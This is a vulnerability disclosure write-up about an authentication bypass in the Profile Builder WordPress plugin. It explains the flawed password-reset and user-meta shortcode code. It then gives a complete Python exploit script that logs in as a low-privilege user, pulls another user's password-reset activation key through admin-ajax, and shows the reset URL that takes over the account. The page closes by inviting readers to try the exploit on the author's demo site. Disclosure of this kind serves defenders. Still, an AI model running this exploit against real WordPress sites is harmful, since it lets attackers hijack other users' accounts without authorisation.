Profile Builder by Cozmoslabs WordPress plugin Authentication Bypass

The plugin was affected by an Auth Bypass vulnerability. The plugin has an improperly used method allowing to reset the user password, and gain unauthorized access.

Let’s check the plugin

The wppb_toolbox_usermeta_handler() function get user meta with the following code:

$value = $user->get( $atts['key'] );

There are no restrictions on what user meta values can be queried.

The wppb_front_end_password_recovery() function handle the password reset with following code:

$key = sanitize_text_field( $_POST['key'] );
$user_object = $wpdb->get_row( $wpdb->prepare( "SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key ) );

The problem is that it queries the user directly using the hashed activation key.

Note: In the core method, the key is sent via email to the user and then stored as hashed in the database. During password reset, the key sent via email is hashed and compared with the database stored hashed key for security reasons, as it prevents abuse of the stored hashed key in the database.

Let’s configure the plugin

In the Profile Builder Settings, select the “Yes” option for “Enable Usermeta shortcode” at “Advanced Settings” tab at “Shortcodes” subtab.

This setting allows the website to use the [user_meta] shortcode.

Let’s create a Recover Password page and add the following shortcode to it:

[wppb-recover-password]

Let’s see how we can exploit this vulnerability

There is an AJAX parser for getting the value of the shortcode, which can be exploited with a logged-in user.

I created a Python script that returns the user_activation_key:

import json
import requests


# remove script tags from text
def remove_script_tags(text):
    import re
    clean = re.compile(r'<script\b[^<]*(?:(?!<\/script>)<[^<]*)*<\/script>')
    return re.sub(clean, '', text).strip()


website_url = 'https://lana.solutions/vdb/cozmoslabs-profile-builder/'
username = 'demo'
password = 'demo'
user_id = '3'

# format urls
website_url = website_url.rstrip('\/') + '/'

# create shortcode
shortcode = '[user_meta user_id="' + user_id + '" key="user_activation_key"]'

with requests.Session() as session:
    # login request
    session.post(website_url + '/wp-login.php', data={
        'log': username,
        'pwd': password
    })

    # parse shortcode request
    response = session.post(website_url + '/wp-admin/admin-ajax.php',
                            headers={'Content-Type': 'application/x-www-form-urlencoded'},
                            data={'action': 'parse-media-shortcode', 'shortcode': shortcode})

    response_json = json.loads(response.text)

    if response_json['success']:
        # get user_activation_key
        user_activation_key = remove_script_tags(response_json['data']['body'])
        print('user_activation_key: %s' % user_activation_key)
    else:
        # get error message
        print(response_json['data']['message'])

the script returns the user activation key as a string:

user_activation_key: 1675860449:$P$BzteMdaBIYji/hnP3IXQhddCmab1FL.

Then we can use the key for password reset.

For this, we have to open the Recover Password page, and add the key parameter to it:

https://lana.solutions/vdb/cozmoslabs-profile-builder/recover-password/?key=1675860449:$P$BzteMdaBIYji/hnP3IXQhddCmab1FL.

If the key is correct, we use the form to change the user’s password using the password and repeat password fields.

Try it

Feel free to try and use the lana.solutions/vdb WordPress websites for testing. I have set the roles and capabilities, so you can only get low level access to the website.

Website: https://lana.solutions/vdb/cozmoslabs-profile-builder/